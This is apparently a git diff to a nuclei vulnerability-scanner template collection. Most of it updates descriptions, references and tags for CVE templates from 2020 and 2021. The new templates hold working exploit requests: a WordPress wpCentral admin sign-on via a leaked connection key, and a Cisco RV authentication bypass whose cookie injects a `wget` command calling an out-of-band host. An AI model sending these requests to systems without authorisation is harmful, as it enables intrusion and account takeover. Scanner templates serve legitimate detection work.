--- /dev/null
+++ b/cves/2020/CVE-2020-9043.yaml
@@ -0,0 +1,72 @@
+id: CVE-2020-9043
+
+info:
+  name: WordPress wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation
+  author: scent2d
+  severity: high
+  description: |
+    The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account.
+  reference:
+    - https://wpscan.com/vulnerability/10074
+    - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043
+    - https://wordpress.org/plugins/wp-central/#developers
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-9043
+    cwe-id: CWE-200
+  metadata:
+    verified: "true"
+  tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_4, 'text/html')"
+          - "status_code_4 == 200"
+          - "contains(body_4, 'wpCentral Connection Key')"
+          - contains(body_4, "pagenow = \'dashboard\'")
+        condition: and
+
+    extractors:
+      - type: regex
+        name: authkey
+        part: body
+        group: 1
+        regex:
+          - 'style="word-wrap:break-word;">([a-z0-9]+)'
+        internal: true
+
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - '_wpnonce=([0-9a-z]+)'
+        internal: true
diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml
index 90d8a3501c..861791c245 100644
--- a/cves/2020/CVE-2020-9047.yaml
+++ b/cves/2020/CVE-2020-9047.yaml
@@ -1,38 +1,33 @@
 id: CVE-2020-9047
 
 info:
-  name: exacqVision Web Service RCE
+  name: exacqVision Web Service - Remote Code Execution
   author: dwisiswant0
   severity: high
   description: |
-    This template supports the detection part only. See references.
-
-    A vulnerability exists that could allow the execution of
-    unauthorized code or operating system commands on systems
-    running exacqVision Web Service versions 20.06.3.0 and prior
-    and exacqVision Enterprise Manager versions 20.06.4.0 and prior.
-
-    An attacker with administrative privileges could potentially
-    download and run a malicious executable that
-    could allow OS command injection on the system.
+    exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system.
   reference:
     - https://github.com/norrismw/CVE-2020-9047
     - https://www.johnsoncontrols.com/cyber-solutions/security-advisories
     - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9047
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2020-9047
     cwe-id: CWE-347
-  tags: cve,cve2020,rce,exacqvision,service
+  tags: cve,cve2020,rce,exacqvision
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/version.web"
+
     matchers-condition: and
     matchers:
+
       - type: word
+        part: body
         words:
           - "3.10.4.72058"
           - "3.12.4.76544"
@@ -59,7 +54,9 @@ requests:
           - "20.03.2.0"
           - "20.06.3.0"
         condition: or
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml
index 3b4c8d7c25..4c74eec890 100644
--- a/cves/2020/CVE-2020-9054.yaml
+++ b/cves/2020/CVE-2020-9054.yaml
@@ -4,17 +4,18 @@ info:
   name: Zyxel NAS Firmware 5.21- Remote Code Execution
   author: dhiyaneshDk
   severity: critical
-  description: "Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker.   However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2."
+  description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker.   However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.'
   reference:
     - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
     - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9054
+    - https://kb.cert.org/vuls/id/498544/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-9054
     cwe-id: CWE-78
-  tags: cve,cve2020,rce,zyxel,injection
+  tags: cve,cve2020,rce,zyxel,injection,kev
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml
index 1ef982df2e..5674973fa1 100644
--- a/cves/2020/CVE-2020-9315.yaml
+++ b/cves/2020/CVE-2020-9315.yaml
@@ -1,19 +1,23 @@
 id: CVE-2020-9315
 
 info:
-  name: Oracle iPlanet Improper Authorization
+  name: Oracle iPlanet Web Server 7.0.x - Authentication Bypass
   author: dhiyaneshDk
   severity: high
-  description: '** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read
-    access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE.'
+  description: |
+    Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.
   reference:
     - https://www.cvebase.com/cve/2020/9315
+    - https://www.oracle.com/support/lifetime-support/
+    - https://www.oracle.com/us/assets/lifetime-support-middleware-069163.pdf
+    - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9315
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-9315
     cwe-id: CWE-306
-  tags: cve,cve2020,oracle
+  tags: cve,cve2020,oracle,auth-bypass,iplanet
 
 requests:
   - method: GET
@@ -35,4 +39,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml
index 90f2e6ddf2..6144d77e1d 100644
--- a/cves/2020/CVE-2020-9344.yaml
+++ b/cves/2020/CVE-2020-9344.yaml
@@ -1,19 +1,22 @@
 id: CVE-2020-9344
 
 info:
-  name: Jira Subversion ALM for enterprise XSS
+  name: Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
+  description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
     - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
     - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13483
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-9344
     cwe-id: CWE-79
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2020,atlassian,jira,xss
 
 requests:
@@ -37,4 +40,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by md on 2022/09/02
diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml
index e8373c9a88..7f7c3feabd 100644
--- a/cves/2020/CVE-2020-9376.yaml
+++ b/cves/2020/CVE-2020-9376.yaml
@@ -1,22 +1,23 @@
 id: CVE-2020-9376
 
 info:
-  name: D-Link Information Disclosure via getcfg.php
+  name: D-Link DIR-610 Devices - Information Disclosure
   author: whynotke
   severity: high
   description: |
-    D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
+    D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
     NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
   reference:
     - https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
     - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
     - https://www.dlink.com.br/produto/dir-610/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-9376
     cwe-id: CWE-74
-  tags: cve,cve2020,dlink,disclosure
+  tags: cve,cve2020,dlink,disclosure,router
 
 requests:
   - method: POST
@@ -29,14 +30,16 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
+        part: body
         words:
           - "<name>Admin</name>"
           - "</usrid>"
           - "</password>"
         condition: and
-        part: body
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml
index 2303ec8aa7..918eada5b4 100644
--- a/cves/2020/CVE-2020-9402.yaml
+++ b/cves/2020/CVE-2020-9402.yaml
@@ -4,20 +4,19 @@ info:
   name: Django SQL Injection
   author: geeknik
   severity: high
-  description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably
-    crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
+  description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
   reference:
     - https://www.debian.org/security/2020/dsa-4705
     - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
     - https://docs.djangoproject.com/en/3.0/releases/security/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9402
+  remediation: Upgrade to the latest version.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-9402
     cwe-id: CWE-89
-  remediation: Upgrade to the latest version.
-  tags: cve,cve2020,django,sqli
+  tags: cve,cve2020,django,sqli,vulhub
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml
index 6efcee878b..f610bf3b4c 100644
--- a/cves/2020/CVE-2020-9425.yaml
+++ b/cves/2020/CVE-2020-9425.yaml
@@ -1,33 +1,38 @@
 id: CVE-2020-9425
 
 info:
-  name: rConfig Unauthenticated Sensitive Information Disclosure
+  name: rConfig <3.9.4 - Sensitive Information Disclosure
   author: madrobot
   severity: high
-  description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application
-    does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
+  description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.
   reference:
     - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
     - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9425
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-9425
     cwe-id: CWE-670
-  tags: cve,cve2020,rconfig
+  tags: cve,cve2020,rconfig.exposure
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/settings.php"
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
+        part: body
         words:
           - "defaultNodeUsername"
           - "defaultNodePassword"
         condition: and
-        part: body
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml
index 91b5f1e879..71700158db 100644
--- a/cves/2020/CVE-2020-9484.yaml
+++ b/cves/2020/CVE-2020-9484.yaml
@@ -14,12 +14,16 @@ info:
   reference:
     - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9484
+    - https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E
+    - https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.0
+    cvss-score: 7
     cve-id: CVE-2020-9484
     cwe-id: CWE-502
-  tags: cve,cve2020,apache,tomcat,rce
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: rce,packetstorm,cve,cve2020,apache,tomcat
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml
index aabdc20f55..1848cad01c 100644
--- a/cves/2020/CVE-2020-9490.yaml
+++ b/cves/2020/CVE-2020-9490.yaml
@@ -1,10 +1,10 @@
 id: CVE-2020-9490
 
 info:
-  name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest DoS
+  name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest Denial of Service Attack
   author: philippedelteil
   severity: high
-  description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
+  description: Apache HTTP Server versions 2.4.20 to 2.4.43 are susceptible to a denial of service attack. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
   reference:
     - https://httpd.apache.org/security/vulnerabilities_24.html
     - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
@@ -15,7 +15,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2020-9490
     cwe-id: CWE-444
-  tags: cve,cve2020,apache,dos
+  tags: cve,cve2020,apache
 
 requests:
   - method: GET
@@ -24,6 +24,8 @@ requests:
 
     matchers:
       - type: regex
+        part: header
         regex:
           - "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
-        part: header
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml
index e5dc6d1115..de8d04bca1 100644
--- a/cves/2020/CVE-2020-9496.yaml
+++ b/cves/2020/CVE-2020-9496.yaml
@@ -1,20 +1,22 @@
 id: CVE-2020-9496
 
 info:
-  name: Apache OFBiz XML-RPC Java Deserialization
+  name: Apache OFBiz 17.12.03 - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
-  description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
+  description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.
   reference:
     - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
     - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html
     - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
+    - https://s.apache.org/l0994
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9496
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-9496
     cwe-id: CWE-79,CWE-502
-  tags: cve,cve2020,apache,java,ofbiz
+  tags: ofbiz,packetstorm,cve,cve2020,apache,java
 
 requests:
   - raw:
@@ -42,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/09/02
diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml
index df40ee6bbf..8595f0a619 100644
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@@ -3,7 +3,7 @@ id: CVE-2020-9757
 info:
   name: Craft CMS < 3.3.0 - Server-Side Template Injection
   author: dwisiswant0
-  severity: high
+  severity: critical
   description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
   reference:
     - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
@@ -12,8 +12,8 @@ info:
     - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9757
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2020-9757
     cwe-id: CWE-74
   tags: cve,cve2020,ssti
diff --git a/cves/2021/CVE-2021-1472.yaml b/cves/2021/CVE-2021-1472.yaml
new file mode 100644
index 0000000000..09aede42dd
--- /dev/null
+++ b/cves/2021/CVE-2021-1472.yaml
@@ -0,0 +1,71 @@
+id: CVE-2021-1472
+
+info:
+  name: Cisco Small Business RV Series - Authentication Bypass and Command Injection
+  author: gy741
+  severity: critical
+  description: |
+    Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote
+    attacker could execute arbitrary commands or bypass authentication and upload files on an affected device.
+  reference:
+    - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
+    - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-1472
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-1473
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-1472
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.html:"Cisco rv340"
+    verified: "true"
+  tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce,intrusive
+
+requests:
+  - raw:
+      - |
+        POST /upload HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: sessionid='`wget http://{{interactsh-url}}`'
+        Authorization: QUt6NkpTeTE6dmk4cW8=
+        Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536
+
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="option"
+
+        5NW9Cw1J
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="destination"
+
+        J0I5k131j2Ku
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="file.path"
+
+        EKsmqqg0
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="file"; filename="config.xml"
+        Content-Type: application/xml
+
+        qJ57CM9
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="filename"
+
+        JbYXJR74n.xml
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="GXbLINHYkFI"
+
+        <input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
+        -----------------------------392306610282184777655655237536--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - http
+
+      - type: word
+        part: body
+        words:
+          - '"jsonrpc":'
diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml
index bcc83ce260..d879c8c812 100644
--- a/cves/2021/CVE-2021-1497.yaml
+++ b/cves/2021/CVE-2021-1497.yaml
@@ -18,7 +18,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-1497
     cwe-id: CWE-78
-  tags: cve,cve2021,cisco,rce,oast
+  tags: cisco,rce,oast,kev,packetstorm,cve,cve2021
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-1498.yaml b/cves/2021/CVE-2021-1498.yaml
index cbdd0306b0..0d7fe3f4b4 100644
--- a/cves/2021/CVE-2021-1498.yaml
+++ b/cves/2021/CVE-2021-1498.yaml
@@ -18,7 +18,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-1498
     cwe-id: CWE-78
-  tags: cve,cve2021,cisco,rce,oast,mirai
+  tags: kev,packetstorm,cve,cve2021,cisco,rce,oast,mirai
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-1499.yaml b/cves/2021/CVE-2021-1499.yaml
index c8832298dd..9042a697e1 100644
--- a/cves/2021/CVE-2021-1499.yaml
+++ b/cves/2021/CVE-2021-1499.yaml
@@ -4,18 +4,18 @@ info:
   name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
   author: gy741
   severity: medium
-  description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is
-    due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload
-    files to the affected device with the permissions of the tomcat8 user.
+  description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
   reference:
     - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
+    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
+    - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
     cvss-score: 5.3
     cve-id: CVE-2021-1499
     cwe-id: CWE-306
-  tags: cve,cve2021,cisco,fileupload,intrusive
+  tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml
index 9eb8c93841..2868443a01 100644
--- a/cves/2021/CVE-2021-20031.yaml
+++ b/cves/2021/CVE-2021-20031.yaml
@@ -4,21 +4,20 @@ info:
   name: Sonicwall SonicOS 7.0 - Host Header Injection
   author: gy741
   severity: medium
-  description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header
-    webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be
-    forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other
-    attack
+  description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
   reference:
     - https://www.exploit-db.com/exploits/50414
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20031
+    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
+    - http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-20031
     cwe-id: CWE-601
   metadata:
-    google-dork: inurl:"auth.html" intitle:"SonicWall"
-  tags: cve,cve2021,sonicwall,redirect
+    google-query: inurl:"auth.html" intitle:"SonicWall"
+  tags: sonicwall,redirect,edb,packetstorm,cve,cve2021
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20038.yaml b/cves/2021/CVE-2021-20038.yaml
index 7fa4e9042a..715965bd7a 100644
--- a/cves/2021/CVE-2021-20038.yaml
+++ b/cves/2021/CVE-2021-20038.yaml
@@ -4,7 +4,7 @@ info:
   name: SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
   author: dwisiswant0, jbaines-r7
   severity: critical
-  description: "A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions."
+  description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
   reference:
     - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
